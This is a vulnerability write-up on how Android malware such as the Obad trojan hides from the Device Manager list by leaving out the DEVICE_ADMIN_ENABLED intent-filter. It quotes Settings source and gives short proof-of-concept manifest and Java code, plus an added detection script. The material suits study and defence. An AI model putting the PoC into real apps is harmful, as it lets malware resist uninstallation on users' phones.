I. Vulnerability description
Backdoor.AndroidOS.Obad.a, known as the "strongest Android trojan in history", uses the Android Device Manager vulnerability to prevent users from uninstalling it normally. In fact, this vulnerability was discovered as early as the end of last year.
Applications registered as a "Device Manager" cannot be directly uninstalled. They can be uninstalled only after the Device Manager has been deactivated.
A trojan can use the Android Device Manager vulnerability to become "stealthy" in the Device Manager list. In this way, users cannot reach the "Cancel activation" page.
II. Affected Versions
Android 2.2 and later
III. Vulnerability principles
First, let's take a look at how the Settings app forms the Device Manager List:
Related Classes:
packages\apps\Settings\src\com\android\settings\DeviceAdminSettings.java
    public class DeviceAdminSettings extends ListFragment {
        DevicePolicyManager mDPM;
        final HashSet<ComponentName> mActiveAdmins = new HashSet<ComponentName>();
        final ArrayList<DeviceAdminInfo> mAvailableAdmins = new ArrayList<DeviceAdminInfo>();

        @Override
        public void onResume() {
            super.onResume();
            updateList();
        }

        void updateList() {
            mActiveAdmins.clear();
            List<ComponentName> cur = mDPM.getActiveAdmins();
            if (cur != null) {
                for (int i = 0; i < cur.size(); i++) {
                    mActiveAdmins.add(cur.get(i));
                }
            }

            mAvailableAdmins.clear();
            // Query the receivers of the "android.app.action.DEVICE_ADMIN_ENABLED"
            // broadcast to get the list of available device managers
            List<ResolveInfo> avail = getActivity().getPackageManager().queryBroadcastReceivers(
                    new Intent(DeviceAdminReceiver.ACTION_DEVICE_ADMIN_ENABLED),
                    PackageManager.GET_META_DATA);
            int count = avail == null ? 0 : avail.size();
            for (int i = 0; i < count; i++) {
                ResolveInfo ri = avail.get(i);
                try {
                    DeviceAdminInfo dpi = new DeviceAdminInfo(getActivity(), ri);
                    // Only an application that has activated the device manager and
                    // registered "android.app.action.DEVICE_ADMIN_ENABLED" appears
                    // in the list of available device managers
                    if (dpi.isVisible() || mActiveAdmins.contains(dpi.getComponent())) {
                        mAvailableAdmins.add(dpi);
                    }
                } catch (XmlPullParserException e) {
                    Log.w(TAG, "Skipping " + ri.activityInfo, e);
                } catch (IOException e) {
                    Log.w(TAG, "Skipping " + ri.activityInfo, e);
                }
            }
            getListView().setAdapter(new PolicyListAdapter());
        }
        .......
        class PolicyListAdapter extends BaseAdapter {
            .......
            public void bindView(View view, int position) {
                final Activity activity = getActivity();
                ViewHolder vh = (ViewHolder) view.getTag();
                // Display the data in mAvailableAdmins
                DeviceAdminInfo item = mAvailableAdmins.get(position);
                vh.icon.setImageDrawable(item.loadIcon(activity.getPackageManager()));
                vh.name.setText(item.loadLabel(activity.getPackageManager()));
                vh.checkbox.setChecked(mActiveAdmins.contains(item.getComponent()));
                try {
                    vh.description.setText(item.loadDescription(activity.getPackageManager()));
                } catch (Resources.NotFoundException e) {
                }
            }
        }
    }
The Android Settings app source code shows that, to be "stealthy" in the Device Manager list, an application only has to not register the "android.app.action.DEVICE_ADMIN_ENABLED" broadcast.
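A static check built on this observation, as an added example that is not part of the original article: it flags receivers in a manifest that carry the device-admin metadata but no "android.app.action.DEVICE_ADMIN_ENABLED" intent-filter, which is exactly the set the Settings query above misses. It assumes the manifest has already been decoded to text XML (for example by apktool); the function name, package names and sample manifests are constructed for illustration.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
ADMIN_ACTION = "android.app.action.DEVICE_ADMIN_ENABLED"
ADMIN_META = "android.app.device_admin"

def hidden_device_admins(manifest_xml):
    """Return receivers that carry device-admin metadata but no
    DEVICE_ADMIN_ENABLED intent-filter, i.e. ones the Settings query misses."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    for rcv in root.iter("receiver"):
        metas = {m.get(A + "name") for m in rcv.findall("meta-data")}
        if ADMIN_META not in metas:
            continue  # not a device-admin receiver
        actions = {a.get(A + "name")
                   for f in rcv.findall("intent-filter")
                   for a in f.findall("action")}
        if ADMIN_ACTION not in actions:
            name = rcv.get(A + "name", "")
            # Resolve the ".Name" shorthand against the manifest package.
            findings.append(package + name if name.startswith(".") else name)
    return findings

# Constructed sample manifests (hypothetical package names, not real apps).
_HEAD = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
         'package="%s"><application>')
_TAIL = "</application></manifest>"
_META = ('<meta-data android:name="android.app.device_admin" '
         'android:resource="@xml/device_admin"/>')

SAMPLE_HIDDEN = (_HEAD % "com.example.hidden"
    + '<receiver android:name=".deviceAdminReceiver" '
      'android:permission="android.permission.BIND_DEVICE_ADMIN">'
    + _META + "</receiver>" + _TAIL)

SAMPLE_NORMAL = (_HEAD % "com.example.normal"
    + '<receiver android:name=".AdminReceiver" '
      'android:permission="android.permission.BIND_DEVICE_ADMIN">'
    + _META
    + '<intent-filter><action android:name="' + ADMIN_ACTION + '"/></intent-filter>'
    + "</receiver>" + _TAIL)

if __name__ == "__main__":
    for label, xml in (("hidden", SAMPLE_HIDDEN), ("normal", SAMPLE_NORMAL)):
        print(label, hidden_device_admins(xml))
```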
IV. PoC code
Register the component in the AndroidManifest.xml file:
    <receiver android:name=".deviceAdminReceiver" android:label="@string/app_name"
        android:description="@string/description" android:permission="android.permission.BIND_DEVICE_ADMIN">
        <meta-data android:name="android.app.device_admin"
            android:resource="@xml/device_admin" />
    </receiver>
Register and activate the Device Manager using Java code:
    // Ask the system to show the "add device administrator" screen for this component
    Intent intent = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
    ComponentName mDeviceComponentName = new ComponentName("packagename", "packagename.deviceAdminReceiver");
    intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, mDeviceComponentName);
    this.startActivityForResult(intent, 0);
V. Related Links
http://www.bkjia.com/Article/201306/221476.html
Article: http://blog.csdn.net/jiazhijun/article/details/9124747
By Jack_Jia mail: 309zhijun@163.com